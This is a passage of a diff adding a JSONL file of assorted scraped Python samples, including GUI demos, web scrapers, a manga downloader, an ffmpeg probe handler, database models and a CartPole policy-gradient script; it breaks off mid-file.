diff --git "a/2158.jsonl" "b/2158.jsonl" new file mode 100644--- /dev/null +++ "b/2158.jsonl" @@ -0,0 +1,661 @@ +{"seq_id":"344061298","text":"import RegisterUIConnect\n\n__author__ = 'win.thitiwat'\n\nimport sys\n\nfrom PySide.QtGui import *\nfrom PySide.QtUiTools import *\nimport RegisterUIConnect\nimport MainWindow\n\n\nimport Resources\n\n\nclass Login(QWidget):\n def __init__(self, parent = None):\n QWidget.__init__(self)\n # layout = QVBoxLayout()\n loader = QUiLoader()\n self.form = loader.load(\"UI/Login.ui\", self)\n # layout.addWidget(self.form)\n # self.setLayout(layout)\n\n self.backgroundLogin = self.form.findChild(QLabel, \"backgroundLogin\")\n self.symbol = self.form.findChild(QLabel, \"symbol\")\n self.create_acc = self.form.findChild(QPushButton, \"createAcc\")\n self.login = self.form.findChild(QPushButton, \"login\")\n self.notify_incorrect = self.form.findChild(QLabel, \"notify_incorrect\")\n\n self.backgroundLogin.setPixmap(QPixmap(\"images/background.png\"))\n self.symbol.setPixmap(QPixmap(\"images/se_kmitl.png\"))\n\n self.create_acc.clicked.connect(self.goRegister)\n self.login.clicked.connect(self.check_Login)\n self.backgroundLogin.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)\n self.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)\n self.setFixedSize(self.form.width(), self.form.height())\n\n def goRegister(self):\n self.hide()\n self.registerPage = RegisterUIConnect.RegisterUIConnect()\n self.registerPage.show()\n pass\n\n def check_Login(self):\n return self.goMainPage()\n\n def goMainPage(self):\n self.hide()\n self.mainWin = MainWindow.MainWindow()\n self.mainWin.show()\n\ndef main():\n app = QApplication(sys.argv)\n sample = Login()\n sample.show()\n return app.exec_()\n\nif __name__ == \"__main__\":\n sys.exit(main())\n\n","sub_path":"Project 170515/Login.py","file_name":"Login.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"130390105","text":"N=int(raw_input())\na=[]\nfor i in range(2,N):\n c=0\n for j in range(2,i):\n\t if i%j==0:\n c=1\n if c==0:\n\t a.append(i)\nif a==[]:\n print(\"0\")\nelse:\n print(\" \".join(str(i) for i in a))\n","sub_path":"all primes lessthen n.py","file_name":"all primes lessthen n.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"642748294","text":"from graphics import *\n\n\ndef main():\n\twin = GraphWin('Periodic table of elements by Sebastian Gorski', 1000, 600)\n\twin.setBackground(\"black\")\n\th = Element(50, 50, 'H', 'Hydrogen', 'blue', win)\n\the = Element(900, 50, 'He', 'Helium', 'orange', win)\n\tli = Element(50, 90, 'Li', 'Lithium', 'blue', win)\n\twin.getMouse()\n\twin.close()\n\nclass Element:\n\tdef __init__(self, x, y, symbol, name, color, window):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.symbol = symbol\n\t\tself.name = name\n\t\tself.window = window\n\t\tself.color = color\n\t\trect = Rectangle(Point(x, y), Point(x+45, y+45))\n\t\trect.setFill(color)\n\t\trect.setOutline(\"white\")\n\t\trect.draw(window)\n\t\ttext = Text(Point(x+20, y+22), symbol)\n\t\ttext.setFill('red')\n\t\ttext.setStyle('bold')\n\t\ttext.setSize(15)\n\t\ttext.draw(window)\n\t\t\n\t\t\n\nmain()\n\n","sub_path":"table/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"196722371","text":"#!/usr/bin/python\r\n# 
-*- coding: utf-8 -*-\r\n\r\nfrom bs4 import BeautifulSoup\r\nfrom download import request\r\nfrom pymongo import MongoClient\r\nimport datetime\r\nimport time\r\nimport os\r\nimport re\r\n\r\nclass duowan(object):\r\n ''''''\r\n\r\n def __init__(self):\r\n\r\n self.index = 'http://tu.duowan.com/tu'\r\n self.lxh_index = ''\r\n client = MongoClient() ## MongDB client\r\n db = client['zzx'] ## choose a db\r\n self.duowan_collection = db['duowan_lxh'] ##choose a collection in db\r\n self.path = 'F:\\\\duowan'\r\n\r\n\r\n def get_all_href(self):\r\n index = request.get(self.index, 3)\r\n Soup = BeautifulSoup(index.text, 'lxml')\r\n li_tmp = Soup.find('div', id='subnav_pk').find_all('li')\r\n for li in li_tmp:\r\n if li.get_text()=='冷笑话':# 冷笑话代表'冷笑话几个字'\r\n self.lxh_index = li.a['href']\r\n break\r\n lxh = request.get(self.lxh_index, 3)\r\n #print(lxh.text)\r\n Soup = BeautifulSoup(lxh.text, 'lxml')\r\n page_href_list = Soup.find_all('li', class_='box')\r\n page_num = 1\r\n for page in page_href_list:\r\n if page['class'] != ['box']:\r\n print(page['class'])\r\n else:\r\n page_title = page.find('em').get_text()\r\n page_link = page.find('em').find('a')['href']\r\n #print(page_title, page_link)\r\n self.get_img(page_title, page_link, page_num)\r\n page_num += 1\r\n\r\n\r\n def get_img(self, page_title, page_link, page_num):\r\n page_link = page_link.replace('gallery', 'scroll')\r\n page_img = request.get(page_link, 3)\r\n Soup = BeautifulSoup(page_img.text, 'lxml')\r\n img_div_list = Soup.find_all('div', class_='pic-box')\r\n img_num = 1\r\n for img_div in img_div_list:\r\n img_title = img_div.find('p').get_text()\r\n #input(img_div)\r\n if img_title != '下期预告':#'下期预告'为'下集预告'\r\n img_src = img_div.find('span')['data-img']\r\n if not self.duowan_collection.find_one({'img_src': img_src}):\r\n self.save_img(img_title, img_src, page_num, img_num)\r\n post = {\r\n 'page_title': page_title,\r\n 'page_link': page_link,\r\n 'img_num': str(page_num)+'.'+str(img_num),\r\n 'img_title': img_title,\r\n 'img_src': img_src\r\n }\r\n print(img_title)\r\n self.duowan_collection.save(post)\r\n print('Success save img data')\r\n img_num += 1\r\n else:\r\n print('该页面已保存')\r\n else:\r\n break\r\n #return img_title, img_src\r\n\r\n def save_img(self, img_title, img_src, page_num, img_num):\r\n os.chdir(os.path.join(self.path))\r\n img = request.get(img_src, 3)\r\n name = str(page_num)+'.'+str(img_num)+' ' + img_title + img_src[-8:]\r\n if re.compile('
<head><title>502 Bad Gateway</title></head>
').match(img.text):\r\n print(re.compile('
<head><title>502 Bad Gateway</title></head>
').match(img.text))\r\n time.sleep(10)\r\n return self.save_img(img_src, img_title)\r\n else:\r\n f = open(name, 'ab')\r\n f.write(img.content)\r\n f.close()\r\n print('Success save ', name, '\\n')\r\n\r\nduowan = duowan()\r\nif __name__ == '__main__':\r\n duowan.get_all_href()","sub_path":"duowan/duowan.py","file_name":"duowan.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"418261981","text":"import os\nfrom data import *\n\n\ndef getch():\n import sys, tty, termios\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\n\ndef print_characters(choose):\n print('\\nYou can choose your class:')\n print('==========================')\n for each in choose:\n print('(' + str(choose.index(each) + 1) + ') ' + each)\n\n\ndef choose_character():\n get_player_name()\n choose = list(CHARACTERS)\n user_input = None\n while user_input not in ['1', '2', '3']:\n print_characters(choose)\n user_input = getch()\n character.append(choose[int(user_input) - 1])\n repository[CHARACTERS[character[0]]] += 1\n set_player_sign()\n\n\ndef get_player_name():\n print('What is your name sheepie?')\n print('==========================')\n name.append(input())\n name.pop(0)\n\n \nif __name__ == '__main__':\n choose_character()\n\n ","sub_path":"create_character.py","file_name":"create_character.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"114362440","text":"import torch\nimport warnings\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom torchtext.data import Example, Dataset, Field, BucketIterator\n\n\nclass TextPreprocessor(BaseEstimator, TransformerMixin):\n def __init__(self, fields, min_freq=1):\n self.fields = fields\n self.min_freq = min_freq\n\n def fit(self, X, y=None):\n dataset = self.transform(X, y)\n for name, field in dataset.fields.items():\n if field.use_vocab:\n field.build_vocab(dataset, min_freq=self.min_freq)\n return self\n\n def transform(self, X, y=None):\n with warnings.catch_warnings(record=True):\n fields = [(name, field) for (name, field) in self.fields\n if name in X]\n proc = [X[col].apply(f.preprocess) for col, f in fields]\n examples = [Example.fromlist(f, fields) for f in zip(*proc)]\n return Dataset(examples, fields)\n\n\ndef build_preprocessor(min_freq=5):\n with warnings.catch_warnings(record=True):\n text_field = Field(\n tokenize=None,\n init_token=None,\n pad_token=\"\",\n unk_token=\"\",\n eos_token=None,\n batch_first=True,\n # pad_first=True,\n )\n fields = [\n ('observed', text_field),\n ('gold', text_field),\n ]\n return TextPreprocessor(fields, min_freq=min_freq)\n\n\nclass SequenceIterator(BucketIterator):\n def __init__(self, *args, **kwargs):\n with warnings.catch_warnings(record=True):\n super().__init__(*args, **kwargs)\n\n def __iter__(self):\n with warnings.catch_warnings(record=True):\n for batch in super().__iter__():\n target = torch.empty(0)\n if 'gold' in batch.fields:\n target = batch.gold.view(-1)\n yield batch.observed, target\n","sub_path":"graphsage/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"36872265","text":"\"\"\"Узнаем что, такое вложенность в 
генераторах, а так же как ее использовать\"\"\"\n\nres= [x + y for x in [1,2,3] for y in [4,5,6]]\nprint(res)\n\nprint('#'*100)\n\n\n\"\"\"Анологичный пример с помощью цикла for\"\"\"\n\nres = []\n\nfor x in [1,2,3]:\n for y in [4,5,6]:\n res.append(x+y)\n\nprint(res)\n","sub_path":"IteratorsAndGenerators/NestedGenerator.py","file_name":"NestedGenerator.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"336493473","text":"\"\"\"Mangapark downloader.\n\nExample:\n Download chapter 20 for the manga Ajin Miura Tsuina\n\n $ python3 main.py -m http://mangapark.me/manga/ajin-miura-tsuina/ -chapter 20\n\"\"\"\nimport re\nimport os\nimport sys\nimport argparse\nimport urllib.request\nimport img2pdf\nfrom bs4 import BeautifulSoup\nfrom PIL import Image\nfrom resizeimage import resizeimage\n\ndef parse_url_to_manga_info(url: str) -> str:\n \"\"\"Extracts the title of a manga from an URL.\n \"\"\"\n url = re.sub('http://', '', url)\n url = re.sub('mangapark.me/manga/', '', url)\n title = url.split(\"/\")[0]\n return title\n\n\ndef parse_url_to_chapter_info(url: str) -> (str, str, str, str):\n \"\"\"Extract manga info from the URL.\n\n Returns:\n 4-tuple containing the mangas title, version, chapter and url\n \"\"\"\n url = re.sub(\"http://\", '', url)\n url = re.sub(\"mangapark.me\", '', url)\n url = re.sub(\"/manga/\", '', url)\n\n # compensate for mangapark's different url formatting schemes\n title, version, chapter = None, None, None\n if len(url.split(\"/\")) == 3:\n title, version, chapter = url.split(\"/\")\n elif len(url.split(\"/\")):\n title, _, version, chapter = url.split(\"/\")\n else:\n raise ValueError(\"Couldn't parse URL\")\n\n return title, version, chapter, url\n\n\ndef ensure_directory_exist(directory: str) -> None:\n \"\"\"Creates a directory, if it doesn't exist yet.\"\"\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef input_images(path: str) -> bytes:\n \"\"\"Reads an image from the specified source.\n\n Args:\n path: The path of the image.\n\n Returns:\n The raw image data.\n \"\"\"\n if path == '-':\n rawdata = sys.stdin.buffer.read()\n else:\n try:\n with open(path, \"rb\") as im:\n rawdata = im.read()\n except IsADirectoryError:\n raise argparse.ArgumentTypeError(\n \"\\\"%s\\\" is a directory\" % path)\n except PermissionError:\n raise argparse.ArgumentTypeError(\n \"\\\"%s\\\" permission denied\" % path)\n except FileNotFoundError:\n raise argparse.ArgumentTypeError(\n \"\\\"%s\\\" does not exist\" % path)\n if len(rawdata) == 0:\n raise argparse.ArgumentTypeError(\"\\\"%s\\\" is empty\" % path)\n return rawdata\n\n\ndef convert_to_pdf(os_dir: str, chapter: str, filenames: list) -> None:\n \"\"\"Converts images to a PDF.\n\n Args:\n os_dir: Directory to save PDF in.\n chapter: Title of the PDF.\n filenames: Images to construct the PDF from.\n \"\"\"\n print(\"Converting chapter %s to pdf...\" % chapter)\n\n pdf_bytes = None\n try:\n pdf_bytes = img2pdf.convert(*[input_images(path) for path in filenames])\n except img2pdf.PdfTooLargeError:\n # Sometimes the images are registered as having a dpi of 1.\n # Because PDF has a limitation of 200 iches max per side, a\n # special layout_fun has to be used, as to prevent an exception.\n\n # default manga size 5\"x7\"\n layout_fun = img2pdf.get_layout_fun(pagesize=(None, img2pdf.in_to_pt(7)),\n imgsize=None, border=None,\n fit=img2pdf.FitMode.into,\n auto_orient=False)\n pdf_bytes = 
img2pdf.convert(*[input_images(path) for path in filenames],\n layout_fun=layout_fun)\n\n file = open(\"%s/%s.pdf\" % (os_dir, chapter), \"wb\")\n file.write(pdf_bytes)\n print(\"Conversion completed!\")\n\n\ndef download_chapter(url: str, height: int) -> None:\n \"\"\"Downloads the chapter specified by the url.\"\"\"\n title, _, chapter, os_dir = parse_url_to_chapter_info(url)\n ensure_directory_exist(os_dir)\n try:\n page = urllib.request.urlopen(url)\n except ValueError:\n page = urllib.request.urlopen(\"http://mangapark.me\" + url)\n\n soup = BeautifulSoup(page, \"html.parser\")\n imgs_wrappers = soup.find_all(\"a\", {\"class\": \"img-link\"})\n filenames = []\n for i in imgs_wrappers:\n img_url = parse_url(i.img['src'])\n filename = img_url.split('/')[-1]\n print(\"Downloading %s %s %s...\" % (title, chapter, filename))\n dir_filename = os_dir + \"/\" + os.path.basename(img_url)\n urllib.request.urlretrieve(img_url, dir_filename)\n new_dir_filename = resize(dir_filename, height)\n filenames.append(new_dir_filename)\n\n convert_to_pdf(os_dir, chapter, filenames)\n\ndef parse_url(url: str) -> str:\n return re.sub(r'\\?.*', '', url)\n\ndef resize(filename: str, height: int) -> str:\n if height == None:\n return filename\n print(\"Resizing %s to %spx height...\" % (filename, height))\n with open(filename, 'r+b') as f:\n with Image.open(f) as image:\n cover = resizeimage.resize_height(image, height)\n new_filename = filename + '.res';\n cover.save(new_filename, image.format)\n return new_filename\n\ndef download_manga(url: str, chapter: int=None, min_max: (int, int)=None, height: int=None) -> None:\n \"\"\"Downloads chapters of a manga.\n\n Args:\n url: The URL of the manga.\n chapter: The chapter to download. If no chapter is specified, the\n min_max parameter will be used.\n min_max: The range of chapters to download.\n height: The height to witch resize all images (keeping the aspect ratio)\n \"\"\"\n page = urllib.request.urlopen(url)\n soup = BeautifulSoup(page, \"html.parser\")\n\n streams = soup.find_all(\"div\", {\"class\": \"stream\"})\n stream_lens = []\n for stream in streams:\n chapters = stream.find_all(\"li\")\n stream_lens += [len(chapters)]\n\n max_stream_len = max(stream_lens)\n max_idx = stream_lens.index(max_stream_len)\n best_stream = streams[max_idx]\n\n chapters = best_stream.find_all(\"li\")\n for c in chapters[::-1]:\n chapter_url = c.em.find_all(\"a\")[-1]['href']\n chapter_no = float(parse_url_to_chapter_info(chapter_url)[2][1: ])\n if chapter and chapter_no == chapter:\n download_chapter(chapter_url, height)\n break\n if min_max and chapter_no >= min_max[0] and chapter_no <= min_max[1]:\n download_chapter(chapter_url, height)\n continue\n\n\ndef main():\n \"\"\"Downloads manga specified in command line arguments.\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('-m', '--manga-url')\n parser.add_argument('-s', '--size', '--height', type=int, help='Height to resize images to (it will keet the aspect ratio)')\n parser.add_argument('-c', '--chapter')\n parser.add_argument('-cs', '--chapters', nargs=2)\n\n args = parser.parse_args()\n print(args)\n if args.manga_url is None:\n print(\"Please specify the URL of the manga on mangapark.me\")\n return\n elif args.chapters != None:\n assert isinstance(args.chapters, list)\n download_manga(args.manga_url, min_max=[float(x) for x in args.chapters], height=args.size)\n elif args.chapter != None:\n download_manga(args.manga_url, chapter=int(args.chapter), height=args.size)\n\n\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"197215627","text":"import random\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef compute_affine_xform(matches,features1,features2,image1,image2):\n \"\"\"\n Computer Vision 600.461/661 Assignment 2\n Args:\n matches (list of tuples): list of index pairs of possible matches. For example, if the 4-th feature in feature_coords1 and the 0-th feature\n in feature_coords2 are determined to be matches, the list should contain (4,0).\n features1 (list of tuples) : list of feature coordinates corresponding to image1\n features2 (list of tuples) : list of feature coordinates corresponding to image2\n image1 (numpy.ndarray): The input image corresponding to features_coords1\n image2 (numpy.ndarray): The input image corresponding to features_coords2\n Returns:\n affine_xform (numpy.ndarray): a 3x3 Affine transformation matrix between the two images, computed using the matches.\n \"\"\"\n \n affine_xform = np.zeros((3,3))\n rows1, columns1 = [item[0] for item in features1], [item[1] for item in features1]\n rows2, columns2 = [item[0] for item in features2], [item[1] for item in features2]\n if len(matches) < 3:\n return affine_xform\n\n num_iter = 200\n best_form = np.zeros((6,1))\n best_inlier = -1\n\n for i in range(0, num_iter):\n randmatch = random.sample(matches, 3)\n x1 = columns1[randmatch[0][0]]\n y1 = rows1[randmatch[0][0]]\n x2 = columns1[randmatch[1][0]]\n y2 = rows1[randmatch[1][0]]\n x3 = columns1[randmatch[2][0]]\n y3 = columns1[randmatch[2][0]]\n\n xp1 = columns2[randmatch[0][1]]\n yp1 = rows2[randmatch[0][1]]\n xp2 = columns2[randmatch[1][1]]\n yp2 = rows2[randmatch[1][1]]\n xp3 = columns2[randmatch[2][1]]\n yp3 = rows2[randmatch[2][1]]\n\n \n A = np.array([[x1, y1, 1, 0, 0, 0], [0, 0, 0, x1, y1, 1], [x2, y2, 1, 0, 0, 0], [0, 0, 0, x2, y2, 1], [x3, y3, 1, 0, 0, 0], [0, 0, 0, x3, y3, 1]])\n\n if np.linalg.cond(A) > 1e+15:\n num_iter += 1\n continue\n \n b = np.array([xp1, yp1, xp2, yp2, xp3,yp3])\n \n #solve least squares\n #temp_affine = np.linalg.inv(A.T*A)*A.T*b\n temp_affine = np.linalg.solve(A,b)\n \n num_inliers = 0\n\n for j in range(0, len(matches)):\n diff_x = (np.dot(temp_affine[0], columns1[matches[j][0]]) + np.dot(temp_affine[1], rows1[matches[j][0]]) + temp_affine[2]) - columns2[matches[j][1]]\n diff_y = (np.dot(temp_affine[3], columns1[matches[j][0]]) + np.dot(temp_affine[4], rows1[matches[j][0]]) + temp_affine[5]) - rows2[matches[j][1]]\n if np.absolute(diff_x) < 3 and np.absolute(diff_y) <3:\n num_inliers += 1\n if num_inliers > best_inlier:\n xform = [[temp_affine[0], temp_affine[1], temp_affine[2]], [temp_affine[3], temp_affine[4], temp_affine[5]], [0, 0, 1]]\n if np.linalg.cond(xform) < 1e+15:\n best_inlier = num_inliers\n best_form = temp_affine\n else: \n num_iter += 1\n affine_xform = [[best_form[0], best_form[1], best_form[2]], [best_form[3], best_form[4], best_form[5]], [0, 0, 1]]\n return affine_xform\n","sub_path":"HW2/compute_affine_xform.py","file_name":"compute_affine_xform.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"251865756","text":"from asyncio import subprocess\nimport os\n\nfrom aiofile import async_open\nfrom core import BasicHandler\nfrom core.utils import pretty_size\nfrom core.web import ObjectNotFound, ServerError\nfrom xid 
import Xid\nimport ffmpeg\n\nDEFAULT_PATH = \"data/media/probe\"\nLIMIT = 10 * 2 << 29 # limit 10G\n\n\nclass APIProbe(BasicHandler):\n \"\"\"convert uploaded media file to mp4 container\n\n url params:\n - async: service will convert media in background\n - url: if start with http(s) will do a request when async task is done\n \"\"\"\n\n async def post(self):\n return await self.process()\n\n async def put(self):\n return await self.process()\n\n async def process(self):\n req = self.request\n\n # save upload data\n try:\n if not os.path.isdir(DEFAULT_PATH):\n os.makedirs(DEFAULT_PATH)\n except OSError:\n self.w(f\"{DEFAULT_PATH} path is not exists\")\n return ServerError()\n\n id = Xid().string()\n path_in = os.path.join(DEFAULT_PATH, id)\n\n size = 0\n\n try:\n async with async_open(path_in, \"wb+\") as fobj:\n async for data in req.content.iter_chunked(2 << 19): # 1mb\n size += len(data)\n\n if size > LIMIT:\n self.e(f\"task {id} upload size over limit {pretty_size(LIMIT)}\")\n raise ValueError()\n\n await fobj.write(data)\n except:\n self.x(f\"task {id} upload with exception\")\n return ServerError()\n\n self.d(f\"task {id} save data size {pretty_size(size)}\")\n\n try:\n probe = ffmpeg.probe(path_in)\n except ffmpeg.Error as e:\n self.e(f\"task {id} failed:{str(e)}\")\n return ServerError(500, str(e))\n finally:\n os.unlink(path_in)\n self.d(f\"task {id} is done\")\n\n video_stream = next((stream for stream in probe[\"streams\"] if stream[\"codec_type\"] == \"video\"), None)\n if video_stream is None:\n self.w(\"task {id} do not have any video stream\")\n return ObjectNotFound()\n\n return {\"data\": video_stream}\n","sub_path":"media/handlers/api_probe.py","file_name":"api_probe.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"331104695","text":"#!user/bin/python\n\nimport apple\nimport env\nimport ciscosparkapi\nfrom logging import Formatter, getLogger, StreamHandler, DEBUG\n\n\nlogger = getLogger(\"cml2_stop_real.\")\nlogger.setLevel(DEBUG)\nhandler = StreamHandler()\nhandler.setLevel(DEBUG)\nfmt = Formatter(\n \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\",\n \"%Y-%m-%dT%H:%M:%S\"\n)\nhandler.setFormatter(fmt)\nlogger.addHandler(handler)\nlogger.propagate = False\n\nenv_object = env.MyEnv()\nhost = env_object.my_env[\"cml2_0\"]\nwebex_token = env_object.my_env[\"webex_token\"]\nwebex_room = env_object.my_env[\"webex_room\"]\n\nob = apple.Cml2(host)\nob.delete_labs()\n\nwebex = ciscosparkapi.CiscoSparkAPI(access_token=webex_token)\nwebex.messages.create(\n webex_room,\n text=\"Successfully Cml stoped !!\"\n)\n\nlogger.debug(\"Successfully Cml stopde!!\")\n","sub_path":"rest/cml_stop_real.py","file_name":"cml_stop_real.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"266186160","text":"from peewee import *\nfrom playhouse.shortcuts import model_to_dict\n\nfrom .utils import send_notify\nfrom .extensions import db\n\n\nclass User(db.Model):\n nickname = CharField(null=False, unique=True)\n email = CharField(null=False)\n profile = CharField(null=True)\n password = CharField(null=False)\n avatar = CharField(null=True)\n is_enabled = BooleanField(default=True)\n is_email_enabled = BooleanField(default=True)\n\n @classmethod\n def disable_email(cls, nickname):\n cls.update(email_enabled=False).where(cls.nickname == nickname).execute()\n\n @classmethod\n def get_by_nickname(cls, 
nickname):\n return cls.select().where(cls.nickname == nickname).first()\n\n @classmethod\n def enable_email(cls, nickname):\n cls.update(email_enabled=True).where(cls.nickname == nickname).execute()\n\n @classmethod\n def disable_account(cls, nickname):\n cls.update(is_enabled=False).where(cls.nickname == nickname).execute()\n\n @classmethod\n def enable_account(cls, nickname):\n cls.update(is_enabled=True).where(cls.nickname == nickname).execute()\n\n\nclass Note(db.Model):\n body = CharField()\n user = ForeignKeyField(User, User.nickname)\n byline = CharField()\n archived = BooleanField(default=False)\n\n @classmethod\n def get_archived_notes(cls, nickname):\n notes = cls.select().where(cls.user == nickname, cls.archived == True)\n return [model_to_dict(note, recurse=False) for note in notes]\n\n @classmethod\n def get_unarchive_by_user(cls, nickname):\n notes = cls.select().where(cls.user == nickname, cls.archived == False)\n return [model_to_dict(note, recurse=False) for note in notes]\n\n def notify(self):\n send_notify(self)\n","sub_path":"saythanks/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"39146625","text":"import sys\n\nfrom smuthi.version import __version__\n\ntry:\n from mpi4py import MPI\n mpi_comm = MPI.COMM_WORLD\n mpi_rank = mpi_comm.Get_rank()\nexcept:\n mpi_rank = 0\n\n\ndef print_smuthi_header():\n welcome_msg = (\"\\n\" + \"*\" * 32 + \"\\n SMUTHI version \" + __version__ + \"\\n\" + \"*\" * 32 + \"\\n\")\n sys.stdout.write(welcome_msg)\n sys.stdout.flush()\n\n\n#if mpi_rank == 0:\n# print_smuthi_header()\n","sub_path":"smuthi/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"110141278","text":"import re\nimport sys\nfrom collections import defaultdict\n\nwith open(\"instr.txt\") as f:\n content = f.readlines()\nreg = re.compile(r'(\\w+) (inc|dec) (-?\\d+) '\n r'if (\\w+) (<|>|==|!=|<=|>=) (-?\\d+)')\n\ndic = defaultdict(int)\nlines = [reg.match(x).groups() for x in content]\n\nfor l in lines:\n if l[4] == '<':\n cond = dic[l[3]] < int(l[5])\n elif l[4] == '<=':\n cond = dic[l[3]] <= int(l[5])\n elif l[4] == '>':\n cond = dic[l[3]] > int(l[5])\n elif l[4] == '>=':\n cond = dic[l[3]] >= int(l[5])\n elif l[4] == '==':\n cond = dic[l[3]] == int(l[5])\n else: # l[4] == '!=':\n cond = dic[l[3]] != int(l[5])\n\n if cond:\n if l[1] == 'inc':\n dic[l[0]] += int(l[2])\n else: # if l[1] == 'dec':\n dic[l[0]] -= int(l[2])\n\nmx = -sys.maxsize - 1\nfor x in dic:\n if dic[x] > mx:\n mx = dic[x]\nprint(mx)\n","sub_path":"8/instr_1.py","file_name":"instr_1.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"47744612","text":"import _plotly_utils.basevalidators\n\n\nclass LineValidator(_plotly_utils.basevalidators.CompoundValidator):\n def __init__(self, plotly_name=\"line\", parent_name=\"violin.box\", **kwargs):\n super(LineValidator, self).__init__(\n plotly_name=plotly_name,\n parent_name=parent_name,\n data_class_str=kwargs.pop(\"data_class_str\", \"Line\"),\n data_docs=kwargs.pop(\n \"data_docs\",\n \"\"\"\n color\n Sets the inner box plot bounding line color.\n width\n Sets the inner box plot bounding line width.\n\"\"\",\n ),\n **kwargs,\n 
)\n","sub_path":"packages/python/plotly/plotly/validators/violin/box/_line.py","file_name":"_line.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"522735985","text":"__author__ = 'kiwee'\n\nimport pymongo\nimport random\n\nconn=pymongo.Connection('localhost', 27017)\nmydb=conn.mydb\nmydb.add_user('test','test')\nmydb.authenticate('test','test')\n\nmuser=mydb.user # new a table\nmuser.save({'id':1, 'name':'test'}) # add a record\nmuser.insert({'id':2, 'name':'hello'}) # add a record\nmuser.find_one() # find a record\nmuser.create_index('id')\ncontent=mydb.user.find()\nfor i in content:\n print(i)\nprint(content)","sub_path":"PycharmProjects/mongotest/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"525199333","text":"import tensorflow as tf\nimport numpy as np\nimport gym\n\nenv = gym.make('CartPole-v0')\nenv = env.unwrapped\n\nenv.seed(1)\n\n# Environment Hyperparameters\nstate_size = 4\naction_size = env.action_space.n\n\n# Training Hyperparameters\nmax_episodes = 1000\nlearning_rate = 0.01\ngamma = 0.95 # Discount rate\n\n# Take the rewards and perform discounting\ndef discount_and_normalize_rewards(episode_rewards):\n discounted_episode_rewards = np.zeros_like(episode_rewards)\n cumulative = 0.0\n for i in reversed(range(len(episode_rewards))):\n cumulative = cumulative * gamma + episode_rewards[i]\n discounted_episode_rewards[i] = cumulative\n\n mean = np.mean(discounted_episode_rewards)\n std = np.std(discounted_episode_rewards)\n discounted_episode_rewards = (discounted_episode_rewards - mean) / (std)\n\n return discounted_episode_rewards\n\n\n# The state is an array of 4 values which will be used as an input\n# The neural network is made up of 3 fully connected layers\n# The output activation function is softmax that squashes the outputs to a probability distribution\nwith tf.name_scope(\"inputs\"):\n input_ = tf.placeholder(tf.float32, [None, state_size], name=\"input_\")\n actions = tf.placeholder(tf.int32, [None, action_size], name=\"actions\")\n discounted_episode_rewards_ = tf.placeholder(tf.float32, [None,], name=\"discounted_episode_rewards\")\n \n mean_reward_ = tf.placeholder(tf.float32, name=\"mean_reward\")\n\n with tf.name_scope(\"fc1\"):\n fc1 = tf.contrib.layers.fully_connected(\n inputs = input_,\n num_outputs = 10,\n activation_fn=tf.nn.relu,\n weights_initializer=tf.contrib.layers.xavier_initializer())\n\n with tf.name_scope(\"fc2\"):\n fc2 = tf.contrib.layers.fully_connected(\n inputs = fc1,\n num_outputs = action_size,\n activation_fn=tf.nn.relu,\n weights_initializer=tf.contrib.layers.xavier_initializer())\n\n with tf.name_scope(\"fc3\"):\n fc3 = tf.contrib.layers.fully_connected(\n inputs = fc2,\n num_outputs = action_size,\n activation_fn=None,\n weights_initializer=tf.contrib.layers.xavier_initializer())\n\n with tf.name_scope(\"softmax\"):\n action_distribution = tf.nn.softmax(fc3)\n\n with tf.name_scope(\"loss\"):\n neg_log_prob = tf.nn.softmax_cross_entropy_with_logits(logits = fc3, labels = actions)\n loss = 